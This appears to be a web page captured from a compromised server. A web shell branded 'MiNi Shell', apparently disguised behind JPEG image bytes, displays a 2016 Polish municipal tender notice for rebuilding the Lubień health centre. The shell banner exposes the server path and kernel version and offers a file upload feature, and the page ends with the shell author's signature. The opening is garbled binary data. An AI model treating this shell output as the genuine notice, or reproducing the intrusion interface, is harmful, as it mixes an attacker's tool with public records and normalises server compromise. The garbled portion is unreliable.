JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160630/113409-N-2016.html

<p class="kh_header"><b>Lubień: Przebudowa z budową polegającą na rozbudowie i zmianie sposobu użytkowania budynku ośrodka zdrowia z instalacjami wewnętrznymi: wod. kan., C.O., elektryczną, gazową, budową parkingu, murów oporowych, kanalizacji opadowej, zbiornika retencyjno - odparowującego, wewnętrznej komunikacji pieszo - kołowej oraz przyłączem kanalizacji sanitarnej - etap 1</b><br>
<b>Numer ogłoszenia: 113409 - 2016; data zamieszczenia: 30.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubień , Lubień 50, 32-433 Lubień, woj. małopolskie, tel. 18 26 82 017, faks 18 26 82 035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubien.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa z budową polegającą na rozbudowie i zmianie sposobu użytkowania budynku ośrodka zdrowia z instalacjami wewnętrznymi: wod. kan., C.O., elektryczną, gazową, budową parkingu, murów oporowych, kanalizacji opadowej, zbiornika retencyjno - odparowującego, wewnętrznej komunikacji pieszo - kołowej oraz przyłączem kanalizacji sanitarnej - etap 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest realizacja etapu I tj. zadania pn. Przebudowa z budową polegającą na rozbudowie i zmianie sposobu użytkowania budynku ośrodka zdrowia z instalacjami wewnętrznymi: wod. kan., C.O., elektryczną, gazową, budową parkingu, murów oporowych, kanalizacji opadowej, zbiornika retencyjno - odparowującego, wewnętrznej komunikacji pieszo - kołowej oraz przyłączem kanalizacji sanitarnej - etap 1  w skład którego wchodzi wykonanie następujących prac:

przebudowa suteren oraz parteru (wyburzenia i domurowania, wymiana drzwi wewnętrznych, skucie i wymiana posadzek na parterze, skucie i wyrównanie poziomu podłogi na gruncie w poziomie suteren, skucie i wykonanie tynków wewnętrznych, montaż nadproży nad wyburzonymi otworami, podbicie fundamentów, malowanie oraz okładziny wewnętrzne, montaż urządzeń sanitarnych oraz aneksów kuchennych wraz z zlewami),rozbudowa suteren oraz parteru, roboty ziemne - niwelacja terenu, montaż daszków zewnętrznych nad wejściami do budynku, wykonanie szybu windowego oraz montaż windy zewnętrznej, przebudowa klatki schodowej na poziomie sutereny - parter, zamontowanie systemu napowietrzania klatki schodowej (w tym montaż studni okiennej), wykonanie przewodów wentylacyjnych dla całości budynku oraz przewodu spalinowego z kotłowni, przebudowa istniejącego dachu w celu wybudowanie szybu windowego windy zewnętrznej, wykonanie izolacji przeciwwodnej dla całości budynku, wykonanie drenażu opasowego wokół budynku, wymiana systemu odwodnienia dachu, wykonanie termoizolacji całości budynku wraz z wymianą niezbędnych okien na wszystkich kondygnacjach ,wykonanie tynków zewnętrznych wraz z nadaniem kolorystyki zewnętrznej, montaż parapetów zewnętrznych na całości budynku oraz parapetów wewnętrznych na poziomie suteren i parteru, wykonanie robót ziemnych oraz miejscowych niezbędnych niwelacji terenu, tymczasowe utwardzenie terenu tłuczniem kamiennym, wykonanie kanalizacji opadowej (wpusty żeliwne) wraz z zbiornikiem retencyjno - odparowującym , wykonanie przyłącza kanalizacji sanitarnej, wycinka drzew owocowych, wykonanie murów oporowych, adaptacja pomieszczenia sutereny na nową kotłownię, montaż instalacji solarnej, wykonanie wewnętrznych instalacji Wod.-Kan. oraz C.O. dla całości budynku, wykonanie wewnętrznej instalacji hydrantowej wraz z montażem hydrantów wewnętrznych, wykonanie instalacji elektrycznej dla parteru i suteren w postaci gniazd wtykowych oraz opraw oświetleniowych oraz wyprowadzenie WLZ elektroenergetycznego dla pierwszego piętra i drugiego piętra, wykonanie instalacji teletechnicznej (monitoring CCTV oraz alarmowej na zewnątrz budynku) dla całości budynku , wykonanie instalacji monitoringu CCTV oraz alarmowej wewnątrz budynku na poziomie suteren oraz parteru, wykonanie instalacji teletechnicznej oraz telewizyjnej i komputerowej i internetowej na poziomie suteren oraz parteru), rozbiórka miejsca gromadzenia odpadów stałych,
rozbiórka szamba oraz studni kanalizacyjnych,
rozbiórka komina zewnętrznego,
montaż klapy oddymiającej oraz systemu sterującego klapą oraz napowietrzeniem klatki schodowej,
wykonanie systemu oddymiania klatki schodowej,
montaż grzejników na poziomie suteren oraz parteru,
docieplenie istniejącego stropu nad II piętrem pianką PUR,
wykonanie schodów zewnętrznych oraz zintegrowanych z nimi murów oporowych,
wykonanie schodów zewnętrznych,  
montaż bramy garażowej.


2. Szczegółowy opis przedmiotu zamówienia znajduje się w przedmiarach  robót,   Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, dokumentacji projektowej.
 
3.  Roboty budowlane stanowiące przedmiot niniejszego zamówienia należy wykonać zgodnie z: 
- dokumentacją projektową
- Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych, 
- przedmiarami robót
- należytą starannością, z zasadami sztuki budowlanej, współczesnej wiedzy technicznej oraz zgodnie 
z obowiązującymi przepisami i normami, w szczególności zawartymi w Prawie Budowlanym, zgodnie ze złożoną ofertą, warunkami przetargu oraz zgodnie z ustaleniami  poczynionymi
 z Zamawiającym (z zastrzeżeniem, iż ustalenia te nie mogą wykraczać poza   przedmiot umowy i nie mogą być sprzeczne z dokumentacją przetargową).
4. W związku z koniecznością zapewnienia opieki zdrowotnej, budynek w trakcie wykonywania robót budowlanych powinien pozostać w ciągłym użytkowaniu. Jeżeli prace wykonywane będą na poziomie suteren parter powinien funkcjonować bez przeszkód. Po skończonych robotach budowlanych w suterenach, funkcje budynku, które dotychczas były na parterze powinny móc być wykonywane w suterenach. Wykonawca przed podjęciem robót budowlanych zobowiązany jest przekazać do akceptacji zamawiającego harmonogram robót budowlanych wraz z wyznaczeniem kolejno wykonywanych robót. Poszczególne kondygnacje budynku objęte robotami budowlanymi powinny być odpowiednio zabezpieczone przed osobami postronnymi zgodnie z prawem budowlanym i przepisami BHP..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość udzielenia   zamówień  uzupełniających  o których mowa  
w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych stanowiących nie więcej niż 30 % wartości zamówienia podstawowego i polegających  na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.21.50.00-7, 45.33.00.00-9, 45.30.00.00-0, 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem przystąpienia do przetargu jest wniesienie wadium przetargowego przed upływem terminu składania ofert  w  wysokości 20. 000,00 zł (słownie : dwadzieścia tysięcy złotych 00/100) na konto Zamawiającego tj. Gmina Lubień,  Bank Spółdzielczy w Mszanie Dolnej  nr  rach.:  
24 88080006 0030 0300 1515 0020  oznaczenie sprawy  IGK.ZP.271.3.2016
2.	Wadium winno być :
wniesione w jednej lub kilku formach określonych  w art. 45.Ust.6 Ustawy tj. może być wnoszone w:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
 - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275 z późn. zm. ).
2.     Dowód wniesienia wadium należy dołączyć do oferty. Nie wniesienie wadium,  o którym mowa w ust.1 pkt 17 niniejszej Specyfikacji powoduje, iż Wykonawca zostanie wykluczony  z przedmiotowego postępowania. 
3.    W przypadku wnoszenia wadium w innej niż pieniądz formie, oryginał zabezpieczenia winien być złożony u Zamawiającego tj. w Urzędzie Gminy Lubień, adres: 32-433 Lubień  50  w terminie określonym w punkcie 17.1. niniejszej specyfikacji,  a kserokopia zabezpieczenia winna być dołączona do oferty. W przypadku wnoszenia wadium w formie pieniądza Wykonawca obowiązany jest do dołączenia 
do Jego oferty, potwierdzonej przez bank, kopii przelewu kwoty wadium. Przelew winien być dokonany 
w terminie gwarantującym wpływ wadium na konto Zamawiającego w terminie określonym w ust. 1 niniejszego punktu specyfikacji.
4. Zwrot i zatrzymanie  wadium następuje na warunkach określonych w art.46 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi spełnić warunek posiadania doświadczenia w  wykonaniu  w okresie  ostatnich 5 lat przed dniem złożenia oferty (a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie) co najmniej 1 roboty  o charakterze oraz  wartości porównywalnej z zakresem zamówienia (jako wartość minimalną przyjmuje się kwotę 800.000,00 złotych brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys ofertowy, kserokopię wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - rękojmia za wady - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dopuszcza się wprowadzenie zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
- nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia, w tym zmiana stawki VAT),
- nastąpi ograniczenie przedmiotu umowy przez Zamawiającego,
- wystąpi konieczność zmiany kluczowych osób: np. inspektora nadzoru, kierownika budowy, osób reprezentujących Strony  w umowie,
- w razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy,
- dopuszcza się zmianę terminu realizacji zamówienia w przypadku wystąpienia niesprzyjających warunków pogodowych.
Ewentualne zmiany umowy zostaną wprowadzone Aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uglubien<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubień,  32-433 Lubień 50, II piętro, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 09:00, miejsce: Urząd Gminy Lubień,  32-433 Lubień 50, I piętro - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com